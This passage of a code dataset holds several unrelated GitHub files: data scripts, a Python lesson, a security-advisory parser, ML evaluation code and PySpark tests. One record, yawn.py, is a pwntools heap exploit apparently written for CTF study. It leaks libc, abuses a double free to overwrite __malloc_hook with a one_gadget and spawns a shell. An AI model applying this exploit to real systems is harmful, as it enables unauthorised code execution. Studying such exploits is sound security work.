location_datapoints[location] = response_json[\"meta\"]['found']\n\nlocations = list(location_datapoints.keys())\nsorted_datapoints = list(location_datapoints.values())\n\nfor i in range(len(sorted_datapoints)):\n for j in range(0, len(sorted_datapoints) - i - 1):\n if sorted_datapoints[j] > sorted_datapoints[j+1]:\n\n temp = sorted_datapoints[j]\n sorted_datapoints[j] = sorted_datapoints[j+1]\n sorted_datapoints[j+1] = temp\n\n temp = locations[j]\n locations[j] = locations[j+1]\n locations[j+1] = temp\n\nsorted_location_datapoints = {locations[i] : sorted_datapoints[i] for i in range(len(sorted_datapoints))}\n\nwith open('location_datapoints.json', 'w') as file:\n json.dump(sorted_location_datapoints, file)\n","repo_name":"MercMayhem/Mumbai-Air-Pollution-analysis-and-AQI-forecasting","sub_path":"location_filtering.py","file_name":"location_filtering.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2337917640","text":"#МНОЖЕСТВА:\n# d1 = {\"anton\",\"anton\", False,}\n# d1.add(5)\n# print(d1)\n# x = set()\n#СЛОВАРИ:\n# anton = \"\"\n# d = {}\n# d={anton: 1\n# }\n# print(d)\n# m = dict()\n\n# phrase =(input(\"text:\")).lower()\n# ne_dolche_milk=list(\".,?!/=+-{}[]()*^':;\")\n# for eee in phrase:\n# if eee not in ne_dolche_milk:\n# anton += eee\n# l = anton.split(\" \")\n# for discord in l:\n# if discord not in d:\n# d[discord]=1\n# else:\n# d[discord] += 1\n# print(d)\n# s = 0\n# d = {\"Хлеб\": 250,\n# \"Дольче милк\": 280,\n# \"Сырок\": 30,\n# \"Ёлка\": 50,\n# }\n# #for price in d: #перебор по ключем\n# for price in d.values(): #и по ключам\n# s += price\n# print(s)\n\n# hog_rider = max(d.values())\n# for (key, values) in d.items():\n# if values == hog_rider:\n# print(f\"kluch:{key},znachenie:{values}\")\n\ndelusion = {\n 3:2,\n 9:2,\n 1:2,\n \"KEY1\":2,\n False:2,\n \"eee\":3,}\ndelusion[\"eee\"], delusion[3] = delusion[3], delusion[\"eee\"]\n","repo_name":"Komarovdb/python","sub_path":"lesson_14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
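Editor's note: the commented-out exercise in the preceding sets/dictionaries record tallies word frequencies while skipping punctuation. A minimal runnable sketch of that idea, assuming the same punctuation list as the record; function and variable names here are illustrative, not from the original:

# Count word frequencies in a phrase, ignoring punctuation (hypothetical helper).
punctuation = set(".,?!/=+-{}[]()*^':;")

def word_counts(phrase):
    # Lowercase, strip punctuation characters, then tally words with a plain dict.
    cleaned = "".join(ch for ch in phrase.lower() if ch not in punctuation)
    counts = {}
    for word in cleaned.split():
        counts[word] = counts.get(word, 0) + 1
    return counts

print(word_counts("Hello, hello world!"))  # -> {'hello': 2, 'world': 1}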
+{"seq_id":"72669895786","text":"from pwn import *\nimport sys\n\nif len(sys.argv) < 2:\n\tdebug = True\nelse:\n\tdebug = False\n\nif debug:\n\tp = process(\"./yawn\")\n\tlibc = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\telf = ELF(\"./yawn\")\nelse:\n\tpass\n\ndef add(name,desc):\n\tp.sendlineafter(\">> \",\"1\")\n\tp.sendafter(\"name: \",name)\n\tp.sendlineafter(\"desc: \",desc)\n\ndef edit(index,name,size,desc):\n\tp.sendlineafter(\">> \",\"2\")\n\tp.sendafter(\"name: \",name)\n\tp.sendlineafter(\"size: \",str(size))\n\tp.sendafter(\"desc: \",desc)\n\ndef free(index):\n\tp.sendlineafter(\">> \",\"3\")\n\tp.sendlineafter(\"idx: \",str(index))\n\ndef show(index):\n\tp.sendlineafter(\">> \",\"4\")\n\tp.sendlineafter(\"idx: \",str(index))\n\ndef debugf():\n\tgdb.attach(p,\"b *0x40103A\")\n\ncontext.log_level = \"debug\"\ncontext.terminal = [\"tmux\",\"splitw\",\"-v\"]\ndebugf()\n# leak libc\nadd(\"a\"*0x50,\"s\"*8 + p64(elf.got[\"read\"]))\nshow(0)\np.recvuntil(\"Description : \")\nread_addr = u64(p.recv(6).ljust(8,\"\\x00\"))\nlibc.address = read_addr - libc.symbols[\"read\"]\nlog.success(\"libc_base:\" + hex(libc.address))\n\n# leak heap\nbss_addr = 0x602040\nadd(\"a\"*0x50,\"s\"*8 + p64(bss_addr))\nshow(1)\np.recvuntil(\"Description : \")\nheap_addr = u64(p.recvuntil(\"\\n\",drop = True).ljust(8,\"\\x00\"))\nheap_base = heap_addr - 0x1040\nlog.success(\"heap_base:\"+hex(heap_base))\nadd(\"b\"*0x50,\"s\"*8 + p64(heap_base + 0x11f0)) #2\nadd(\"a\\n\",\"s\")\nfree(2)\nfree(3)\nadd(p64(libc.symbols[\"__malloc_hook\"] - 0x23) + \"\\n\",\"s\")\nadd(\"a\\n\",\"s\")\none_gadget = libc.address + 0xf02a4\npayload = \"aaa\" + \"a\"*8*2 + p64(one_gadget) + \"\\n\"\nadd(\"a\\n\",\"s\")\nadd(payload,\"s\")\nadd(\"a\\n\",\"s\")\np.interactive()\n","repo_name":"davidwu1999/Pwn","sub_path":"pwn_study/problem/double_free/YAWN/yawn.py","file_name":"yawn.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6704037651","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\n@date: 2015-06-09\n@author: shell.xu\n'''\nimport logging, cStringIO\nfrom lxml import etree\nfrom lxml.cssselect import CSSSelector\nimport utils\n\nNS = 'http://www.w3.org/2005/Atom'\nURL = 'http://www.ubuntu.com/usn/rss.xml'\n\nsel_packages = CSSSelector('dl dd>a')\nsel_cves = CSSSelector('p>a')\n\ndef get_details(tree):\n run = False\n texts = []\n for e in tree.iter():\n if e.tag == 'h3':\n run = e.text == 'Details'\n elif run:\n s = etree.tostring(e, method='text', encoding='UTF-8').strip()\n texts.append(s)\n return ' '.join(texts)\n\ndef get_cves(tree):\n for cve in sel_cves(tree):\n href = cve.get('href')\n if href.startswith('http://people.ubuntu.com/~ubuntu-security/cve'):\n yield (cve.text, href)\n return\n\ndef parse_usn(e):\n name, title = e.find('title').text.split(':', 1)\n name, title = name.strip(), title.strip()\n link = e.find('link').text\n\n tree = etree.HTML(e.find('description').text)\n produces = [p.text for p in sel_packages(tree)]\n\n details = get_details(tree)\n descbuf = cStringIO.StringIO()\n descbuf.write(' {}\\n {}\\n * {}\\n'.format(title, details, link))\n for cve, url in get_cves(tree):\n descbuf.write(' # {}\\n * {}\\n'.format(cve, url))\n\n return {'name': name, 'produces': '\\n'.join(produces), 'desc': descbuf.getvalue()}\n\ndef parse_list(cache):\n r = utils.download(URL)\n if cache and r.status_code == 304:\n logging.info('usn url not modify, passed.')\n return\n\n logging.debug('parse usn 
xml')\n tree = etree.fromstring(r.content)\n for e in tree.iterfind('channel/item', namespaces={'ns': NS}):\n yield parse_usn(e)\n\ndef getlist(cache):\n try:\n usnlist = list(parse_list(cache))\n logging.info('usnlist length {}'.format(len(usnlist)))\n return usnlist\n except Exception as err:\n import traceback\n logging.error(traceback.format_exc())\n return []\n","repo_name":"shell909090/cves","sub_path":"usn.py","file_name":"usn.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"37516271424","text":"import torch\n# import numpy as np\nimport argparse\nimport os\nimport time\nimport tqdm\nfrom torch.utils.data import DataLoader\nfrom SPUBERT.dataset.ethucy import ETHUCYDataset\nfrom SPUBERT.dataset.sdd import SDDDataset\nfrom SPUBERT.model.spubert import (\n SPUBERTTGPConfig, SPUBERTMGPConfig, SPUBERTConfig, SPUBERTModel\n)\nfrom SPUBERT.model.loss import bom_loss\nfrom SPUBERT.dataset.grid_map_numpy import estimate_map_length, estimate_num_patch\n\ndef test():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset_path', default='./data', help='dataset path')\n parser.add_argument('--dataset_name', default='ethucy', help='dataset name (ethucy, sdd)')\n parser.add_argument(\"--dataset_split\", default='univ', help='dataset split for ethucy dataset(eth, hotel, univ, zara1, zara2')\n parser.add_argument('--output_path', default='./output', help='output path')\n parser.add_argument('--output_name', default='test', help='output model name')\n parser.add_argument(\"--cuda\", action='store_true', help=\"training with CUDA\")\n parser.add_argument(\"--batch_size\", type=int, default=32, help=\"batch size\")\n parser.add_argument(\"--num_worker\", type=int, default=4, help=\"dataloader worker size\")\n parser.add_argument(\"--obs_len\", type=int, default=8, help=\"number of observation frames\")\n parser.add_argument(\"--pred_len\", type=int, default=12, help=\"number of prediction frames\")\n parser.add_argument(\"--num_nbr\", type=int, default=4, help=\"number of neighbors\")\n parser.add_argument(\"--view_range\", type=float, default=20.0, help=\"accessible range boundary of target pedestrian\")\n parser.add_argument(\"--view_angle\", type=float, default=2.09, help=\"accessible angle boundary of target pedestrian\")\n parser.add_argument(\"--social_range\", type=float, default=2.0, help=\"socially-aware range\")\n parser.add_argument(\"--env_range\", type=float, default=10.0, help=\"physically-aware range\")\n parser.add_argument(\"--env_resol\", type=float, default=0.2, help=\"physically-aware resolution\")\n parser.add_argument(\"--patch_size\", type=int, default=16, help=\"physically-aware patch size for ViT\")\n parser.add_argument('--scene', action='store_true', help='physically-aware, true, or false ')\n parser.add_argument(\"--hidden\", type=int, default=256, help=\"hidden size of transformer model\")\n parser.add_argument(\"--layer\", type=int, default=4, help=\"number of layers\")\n parser.add_argument(\"--head\", type=int, default=4, help=\"number of attention heads\")\n parser.add_argument(\"--goal_hidden\", type=int, default=64, help=\"goal hidden size of transformer model\")\n parser.add_argument(\"--goal_latent\", type=int, default=32, help=\"goal latent hidden size of transformer model\")\n parser.add_argument(\"--k_sample\", type=int, default=20, help=\"number of multimodal samples\")\n parser.add_argument(\"--d_sample\", type=int, default=1000, 
help=\"number of goal intention samples\")\n\n args = parser.parse_args()\n if args.dataset_name == 'ethucy':\n print(\"ETH/UCY Dataset Loading...\")\n test_dataset = ETHUCYDataset(split=\"test\", args=args)\n test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.num_worker, shuffle=False)\n elif args.dataset_name == 'sdd':\n print(\"SDD Dataset Loading...\")\n args.dataset_split = 'default'\n test_dataset = SDDDataset(split=\"test\", args=args)\n test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.num_worker, shuffle=False)\n else:\n print(\"Dataset is not loaded.\")\n\n model_path = os.path.join(args.output_path, args.dataset_name, args.dataset_split, args.output_name+\".pth\")\n\n if args.scene:\n num_patch = estimate_num_patch(estimate_map_length(args.env_range * 2, args.env_resol), args.patch_size)\n else:\n num_patch = 0\n \n spubert_tgp_cfgs = SPUBERTTGPConfig(\n hidden_size=args.hidden, num_layer=args.layer, num_head=args.head, obs_len=args.obs_len,\n pred_len=args.pred_len, num_nbr=args.num_nbr, scene=args.scene, num_patch=num_patch,\n patch_size=args.patch_size, view_range=args.view_range, view_angle=args.view_angle, social_range=args.social_range)\n\n spubert_mgp_cfgs = SPUBERTMGPConfig(\n hidden_size=args.hidden, num_layer=args.layer, num_head=args.head, k_sample=args.k_sample,\n goal_hidden_size=args.goal_hidden, goal_latent_size=args.goal_latent, obs_len=args.obs_len,\n pred_len=args.pred_len, num_nbr=args.num_nbr, scene=args.scene, num_patch=num_patch, patch_size=args.patch_size,\n view_range=args.view_range, view_angle=args.view_angle, social_range=args.social_range)\n spubert_cfgs = SPUBERTConfig(traj_cfgs=spubert_tgp_cfgs, goal_cfgs=spubert_mgp_cfgs)\n \n model = SPUBERTModel(spubert_tgp_cfgs, spubert_mgp_cfgs, spubert_cfgs)\n model.load_state_dict(torch.load(model_path))\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() and args.cuda else \"cpu\")\n model.to(device)\n diff_time = 0\n with torch.no_grad():\n model.eval()\n total_aderror = 0\n total_fderror = 0\n total_gderror = 0\n total_data = 0\n data_iter = tqdm.tqdm(enumerate(test_dataloader),\n desc=\"%s\" % (\"TEST\"),\n total=len(test_dataloader),\n bar_format=\"{l_bar}{r_bar}\")\n for i, data in data_iter:\n data = {key: value.to(device) for key, value in data.items()}\n if args.scene:\n start_time = time.time()\n outputs = model.inference(mgp_spatial_ids=data[\"mgp_spatial_ids\"],\n mgp_temporal_ids=data[\"mgp_temporal_ids\"], mgp_segment_ids=data[\"mgp_segment_ids\"], mgp_attn_mask=data[\"mgp_attn_mask\"],\n tgp_temporal_ids=data[\"tgp_temporal_ids\"], tgp_segment_ids=data[\"tgp_segment_ids\"], tgp_attn_mask=data[\"tgp_attn_mask\"],\n env_spatial_ids=data[\"env_spatial_ids\"], env_temporal_ids=data[\"env_temporal_ids\"],\n env_segment_ids=data[\"env_segment_ids\"], env_attn_mask=data[\"env_attn_mask\"], output_attentions=True, d_sample=args.d_sample)\n diff_time += (time.time() - start_time)\n else:\n start_time = time.time()\n outputs = model.inference(mgp_spatial_ids=data[\"mgp_spatial_ids\"],\n mgp_temporal_ids=data[\"mgp_temporal_ids\"], mgp_segment_ids=data[\"mgp_segment_ids\"], mgp_attn_mask=data[\"mgp_attn_mask\"],\n tgp_temporal_ids=data[\"tgp_temporal_ids\"], tgp_segment_ids=data[\"tgp_segment_ids\"], tgp_attn_mask=data[\"tgp_attn_mask\"],\n output_attentions=True, d_sample=args.d_sample)\n diff_time += (time.time() - start_time)\n\n avg_time = diff_time / (i + 1)\n\n outputs[\"pred_trajs\"] = 
torch.einsum('bkts,b->bkts', outputs[\"pred_trajs\"], data[\"scales\"])\n outputs[\"pred_goals\"] = torch.einsum('bks,b->bks', outputs[\"pred_goals\"], data[\"scales\"])\n data[\"traj_lbl\"] = torch.einsum('bts,b->bts', data[\"traj_lbl\"], data[\"scales\"])\n data[\"goal_lbl\"] = torch.einsum('bs,b->bs', data[\"goal_lbl\"], data[\"scales\"])\n gderror, aderror, fderror = bom_loss(\n outputs[\"pred_goals\"], outputs[\"pred_trajs\"], data[\"goal_lbl\"], data[\"traj_lbl\"],\n args.k_sample)\n\n total_aderror += aderror\n total_fderror += fderror\n total_gderror += gderror\n total_data += len(data[\"mgp_spatial_ids\"])\n print(\"\\nEpoch Evaluation Result >>>>> ADE: %f, FDE: %f, GDE: %f\" % (\n aderror / len(data[\"mgp_spatial_ids\"]), fderror / len(data[\"mgp_spatial_ids\"]),\n gderror / len(data[\"mgp_spatial_ids\"])))\n print(\"Epoch Average Time >>>>> \", avg_time)\n print(\"Total Evaluation Result >>>>> ADE: %f, FDE: %f, GDE: %f\" % (total_aderror/total_data, total_fderror/total_data, total_gderror/total_data))\n print(\"Total Average Computation Time >>>>> %f s\" % avg_time)\n\nif __name__=='__main__':\n test()","repo_name":"kina4147/SPUBERT","sub_path":"demo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27270048043","text":"\nfrom scipy.sparse import *\nimport csv\nimport numpy as np\nimport pandas as pd\nimport sklearn.linear_model as sk\nfrom sklearn import svm\nimport sklearn.model_selection as ms\nimport string\nfrom gensim.models import word2vec\n\ndef construct_vector(data,set_to_fill,model,lengt):\n \"\"\"\n Creates an array that contains tweet features representation\n Arguments: data The set of tweet in string\n set_to_fill The array you need to fill with the corresponding features representation of the tweet at index i\n vocab a vocabulary that return the index of the word given in argument when doing vocab.get(word,-1) , and - 1 if not found\n embedding a Matrix that represent the feature representation of words (in accord of indexes with vocab)\n \"\"\" \n list_auxiliarry_pos = [\"must\",\"need\",\"should\",\"may\",\"might\",\"can\",\"could\",\"shall\",\"would\",\"will\"]\n list_auxiliarry_neg = [\"won't\",\"shouldn't\",\"not\",\"can't\",\"couldn't\",\"wouldn't\"]\n counter = lambda l1, l2: len(list(filter(lambda c: c in l2, l1))) #Used later to count number fo punctuation\n \n for j in range(0,np.shape(data)[0]): # For each tweet\n list_word = data[j].split() # Split into an array of words\n num_punctu = counter(data[j],string.punctuation) # count the punctuation\n divider = 0 #Initialize some parameters for additional features\n average = 0\n num_user =0\n num_url= 0\n num3point = 0\n num_aux_pos =0\n num_aux_neg =0\n for i in list_word: # For each word, fill the variable used for additional features\n average+=len(i)\n if(i==\"\"):\n num_user+=1\n if(i==\"\"):\n num_url+=1\n if(i==\"...\"): \n num3point+=1\n if(i in list_auxiliarry_pos):\n num_aux_pos+=1\n if(i in list_auxiliarry_neg):\n num_aux_neg+=1\n if(i in model):\n divider+=1\n set_to_fill[j,1:lengt+1] += model[i]\n if(divider>0):\n set_to_fill[j,1:lengt+1] = (set_to_fill[j,1:lengt+1]/divider)\n set_to_fill[j,lengt+1] = len(list_word) #add the # word\n set_to_fill[j,lengt+2] = num_punctu #add the # punctuation\n if(len(list_word)>0):\n set_to_fill[j,lengt+3] = average/len(list_word) #add length of word in average\n else :\n set_to_fill[j,lengt+3] = 0\n set_to_fill[j,lengt+4] = 
num_aux_pos #word in a list of auxilarry\n set_to_fill[j,lengt+5] = num_aux_neg #word in a list of negative aux\n set_to_fill[j,lengt+6] = num3point #number of ...\n set_to_fill[j,lengt+7] = num_user #number of \n set_to_fill[j,lengt+8] = num_url #number of \n return set_to_fill\n\ndef construct_features(path_pos,path_neg,train_path):\n '''\n construct a feature representation of each training tweet \n (by averaging the word vectors over all words of the tweet).\n Using the model created by word2vec\n '''\n size = 200\n window = 8\n sentences = word2vec.LineSentence(train_path) #Load the tweet (the whole training set)\n model = word2vec.Word2Vec(sentences,min_count = 2, size=size,window =window) # create the embeddding for each words, that appear more than 2 time\n # and with an embedding size of 200 and dependency windows of 8 characters\n print(\"finish construct model\")\n\t\n additional_features = 8 #Number of added features by hand (easier to scale the vectors)\n \n #Create tweet embedding for positive\n pos_train = open(path_pos,encoding='utf-8').readlines()\n lengt = size\n pos_mask = np.zeros(lengt+1+additional_features)\n pos_mask[0] +=1\n #adding 1 at start : this is target (1 is for happy emoji, 0 or -1 for sad face)\n #will add 3 features , number of word , average length of words, and #punctuation\n training_set_pos = np.zeros(((np.shape(pos_train)[0],lengt+1+additional_features))) + pos_mask\n #for each word, search if it is in pos_train or neg_train\n training_set_pos = construct_vector(pos_train,training_set_pos,model,lengt)\n \n #Create tweet embeddings for negative\n neg_train = open(path_neg,encoding='utf-8').readlines()\n training_set_neg = np.zeros(((np.shape(neg_train)[0],lengt+1+additional_features)))\n #for each word, search if it is in pos_train or neg_train\n training_set_neg = construct_vector(neg_train,training_set_neg,model,lengt)\n \n #Save the embeddings\n np.save('data/trainingsetword2vec_pos', training_set_pos)\n np.save('data/trainingsetword2vec_neg', training_set_neg)\n return model\n\t\ndef create_csv_submission(ids, y_pred, name):\n \"\"\"\n Creates an output file in csv format for submission to kaggle\n Arguments: ids (event ids associated with each prediction)\n y_pred (predicted class labels)\n name (string name of .csv output file to be created)\n \"\"\"\n with open(name, 'w') as csvfile:\n fieldnames = ['Id', 'Prediction']\n writer = csv.DictWriter(csvfile, delimiter=\",\", fieldnames=fieldnames)\n writer.writeheader()\n for r1, r2 in zip(ids, y_pred):\n writer.writerow({'Id':int(r1),'Prediction':int(r2)})\n\n\t\t\t\n\t\t\t\ndef predict_labels(model,path_testing,flag=\".npy\"):\n \"\"\"\n Used to predict the label on a given training Set\n With a constructed model from word2vec\n \"\"\"\n #Load the training set\n path_neg = str(\"data/trainingsetword2vec_neg\"+flag)\n path_pos = str(\"data/trainingsetword2vec_pos\"+flag)\n ts_neg = np.load(path_neg)\n ts_pos = np.load(path_pos)\n #Train a Linear Classifier: Train a linear classifier (e.g. logistic regression or SVM) on your constructed \n #features, using the scikit learn library, or your own code from the earlier labs. 
Recall that the labels \n #indicate if a tweet used to contain a :) or :( smiley.\n training_set = np.concatenate((ts_neg,ts_pos))\n y = training_set[:,0]\n X = training_set[:,1:np.shape(training_set)[1]]\n #Now we load and predict the data\n data = open(path_testing,encoding='utf-8').readlines()\n idx = np.zeros(np.shape(data)[0])\n tweets = [\"\" for a in range(0,np.shape(data)[0])]\n for i in range(0,np.shape(data)[0]):\n idx[i] =(i+1)\n tweets[i] = data[i]\n \n #Construct the logistic regressor\n LR = sk.LogisticRegressionCV()\n #LogisticRegression(penalty='l2', dual=False, tol=0.0001, C=1.0, fit_intercept=True, intercept_scaling=1, \n #class_weight=None, random_state=None, solver='liblinear', max_iter=100, multi_class='ovr', verbose=0, \n #warm_start=False, n_jobs=1)[source]¶\n #http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html\n #train the logistic regressor\n \n #Do a K fold on the training set to have an idea of the error.\n kf = ms.KFold(n_splits=3,shuffle=True)\n for train_idx, test_idx in kf.split(X):\n train_set = X[train_idx]\n test_set = X[test_idx]\n train_target = y[train_idx]\n test_target = y[test_idx] \n LR.fit(train_set,train_target)\n predictions_temp = LR.predict(test_set)\n print(predictions_temp.shape)\n print(test_target.shape) \n error = np.sum(np.power(predictions_temp-test_target,2))/np.shape(predictions_temp)[0]\n print(\"Yet, error is\",error)\n #Fit the prediction model\n LR.fit(X,y)\n\n #And now, predict the results\n topredict = construct_features_for_test_set(model,tweets)\n topredict_poly = topredict\n print(\"test set constructed\")\n predictions = LR.predict(topredict_poly)\n #Construct the submission\n predictions = predictions*2-1\n create_csv_submission(idx,predictions,\"submission.csv\")\n \ndef construct_features_for_test_set(model,test_set_tweet):\n \"\"\"\n Creates Features representation for the test set, we do not use the same method\n as the structure is a little different ( no labels)\n test_set_tweet: the text representation of the given tweets\n model ; the model used for word feature representation\n return : the representation in features of the set of tweet\n \"\"\"\n list_auxiliarry_pos = [\"must\",\"need\",\"should\",\"may\",\"might\",\"can\",\"could\",\"shall\",\"would\",\"will\"]\n list_auxiliarry_neg = [\"won't\",\"shouldn't\",\"not\",\"can't\",\"couldn't\",\"wouldn't\"]\n counter = lambda l1, l2: len(list(filter(lambda c: c in l2, l1))) #Used later to count number fo punctuation\n \n additional_features = 8\n lengt = 200\n test_set = np.zeros((np.shape(test_set_tweet)[0],lengt+additional_features))\n for j in range(0,np.shape(test_set)[0]):\n num_punctu = counter(test_set_tweet[j],string.punctuation)\n list_word = test_set_tweet[j].split()\n divider = 0\n average = 0\n num3point = 0\n num_aux_pos =0\n num_aux_neg =0\n num_user = 0\n num_url= 0\n for i in list_word:\n average+=len(i)\n if(i==\"\"):\n num_user+=1\n if(i==\"\"):\n num_url+=1\n if(i==\"...\"): \n num3point+=1\n if(i in list_auxiliarry_pos):\n num_aux_pos+=1\n if(i in list_auxiliarry_neg):\n num_aux_neg+=1\n if(i in model):\n divider+=1\n test_set[j,:lengt] += model[i]\n if(divider>0):\n test_set[j,:lengt] = (test_set[j,:lengt]/divider)\n test_set[j,lengt] = len(list_word) #add the # word\n test_set[j,lengt+1] = num_punctu #add the # punctuation\n if(len(list_word) >0):\n test_set[j,lengt+2] = average/len(list_word)#add length of word in average\n else : \n test_set[j,lengt+2] = 0\n test_set[j,lengt+3] = num_aux_pos #word in a 
list of auxilarry\n test_set[j,lengt+4] = num_aux_neg #word in a list of negative aux\n test_set[j,lengt+5] = num3point #number of ...\n test_set[j,lengt+6] = num_user #number of \n test_set[j,lengt+7] = num_url #number of \n return test_set\n\n\n","repo_name":"maxpr/PCML_Proj2","sub_path":"src/word2vec_routines.py","file_name":"word2vec_routines.py","file_ext":"py","file_size_in_byte":10164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34869741894","text":"import pytest\nfrom pyspark.sql.types import StructType, StructField, StringType\n\nimport quinn\nfrom tests.conftest import auto_inject_fixtures\nimport chispa\n\nfrom functools import reduce\n\n\n@auto_inject_fixtures(\"spark\")\ndef describe_with_columns_renamed():\n def it_renames_spaces_to_underscores(spark):\n def spaces_to_underscores(s):\n return s.replace(\" \", \"_\")\n\n schema = StructType(\n [\n StructField(\"i like cheese\", StringType(), True),\n StructField(\"yummy stuff\", StringType(), True),\n ]\n )\n data = [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_columns_renamed(spaces_to_underscores)(source_df)\n expected_df = spark.create_df(\n [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")],\n [\n (\"i_like_cheese\", StringType(), True),\n (\"yummy_stuff\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_renames_dots_to_underscores(spark):\n def dots_to_underscores(s):\n return s.replace(\".\", \"_\")\n\n schema = StructType(\n [\n StructField(\"i.like.cheese\", StringType(), True),\n StructField(\"yummy.stuff\", StringType(), True),\n ]\n )\n data = [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_columns_renamed(dots_to_underscores)(source_df)\n expected_df = spark.create_df(\n [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")],\n [\n (\"i_like_cheese\", StringType(), True),\n (\"yummy_stuff\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n\ndef describe_with_some_columns_renamed():\n def it_renames_columns_based_on_a_map(spark):\n mapping = {\"chips\": \"french_fries\", \"petrol\": \"gas\"}\n\n def british_to_american(s):\n return mapping[s]\n\n def change_col_name(s):\n return s in mapping\n\n schema = StructType(\n [\n StructField(\"chips\", StringType(), True),\n StructField(\"hi\", StringType(), True),\n StructField(\"petrol\", StringType(), True),\n ]\n )\n data = [(\"potato\", \"hola!\", \"disel\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_some_columns_renamed(\n british_to_american, change_col_name\n )(source_df)\n expected_df = spark.create_df(\n [(\"potato\", \"hola!\", \"disel\")],\n [\n (\"french_fries\", StringType(), True),\n (\"hi\", StringType(), True),\n (\"gas\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_renames_some_columns_with_dots(spark):\n def dots_to_underscores(s):\n return s.replace(\".\", \"_\")\n\n def change_col_name(s):\n return s.startswith(\"a\")\n\n schema = StructType(\n [\n StructField(\"a.person\", StringType(), True),\n StructField(\"a.thing\", StringType(), True),\n StructField(\"b.person\", StringType(), True),\n ]\n )\n data = [(\"frank\", \"hot dog\", \"mia\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_some_columns_renamed(\n dots_to_underscores, 
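# descriptive note: dots_to_underscores rewrites each selected column name; change_col_name (the next argument) is the predicate that decides which columns get renamed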
change_col_name\n )(source_df)\n expected_df = spark.create_df(\n [(\"frank\", \"hot dog\", \"mia\")],\n [\n (\"a_person\", StringType(), True),\n (\"a_thing\", StringType(), True),\n (\"b.person\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n\ndef describe_snake_case_col_names():\n def it_snake_cases_col_names(spark):\n schema = StructType(\n [\n StructField(\"I like CHEESE\", StringType(), True),\n StructField(\"YUMMMMY stuff\", StringType(), True),\n ]\n )\n data = [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.snake_case_col_names(source_df)\n expected_df = spark.create_df(\n [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")],\n [\n (\"i_like_cheese\", StringType(), True),\n (\"yummmmy_stuff\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n\ndef describe_sort_columns():\n def it_sorts_columns_in_asc_order(spark):\n source_df = spark.create_df(\n [\n (\"jose\", \"oak\", \"switch\"),\n (\"li\", \"redwood\", \"xbox\"),\n (\"luisa\", \"maple\", \"ps4\"),\n ],\n [\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n actual_df = quinn.sort_columns(source_df, \"asc\")\n expected_df = spark.create_df(\n [\n (\"switch\", \"jose\", \"oak\"),\n (\"xbox\", \"li\", \"redwood\"),\n (\"ps4\", \"luisa\", \"maple\"),\n ],\n [\n (\"gaming_system\", StringType(), True),\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_sorts_columns_in_desc_order(spark):\n source_df = spark.create_df(\n [\n (\"jose\", \"oak\", \"switch\"),\n (\"li\", \"redwood\", \"xbox\"),\n (\"luisa\", \"maple\", \"ps4\"),\n ],\n [\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n actual_df = quinn.sort_columns(source_df, \"desc\")\n expected_df = spark.create_df(\n [\n (\"oak\", \"jose\", \"switch\"),\n (\"redwood\", \"li\", \"xbox\"),\n (\"maple\", \"luisa\", \"ps4\"),\n ],\n [\n (\"tree\", StringType(), True),\n (\"name\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_throws_an_error_if_the_sort_order_is_invalid(spark):\n source_df = spark.create_df(\n [\n (\"jose\", \"oak\", \"switch\"),\n (\"li\", \"redwood\", \"xbox\"),\n (\"luisa\", \"maple\", \"ps4\"),\n ],\n [\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n with pytest.raises(ValueError) as excinfo:\n quinn.sort_columns(source_df, \"cats\")\n assert (\n excinfo.value.args[0]\n == \"['asc', 'desc'] are the only valid sort orders and you entered a sort order of 'cats'\"\n 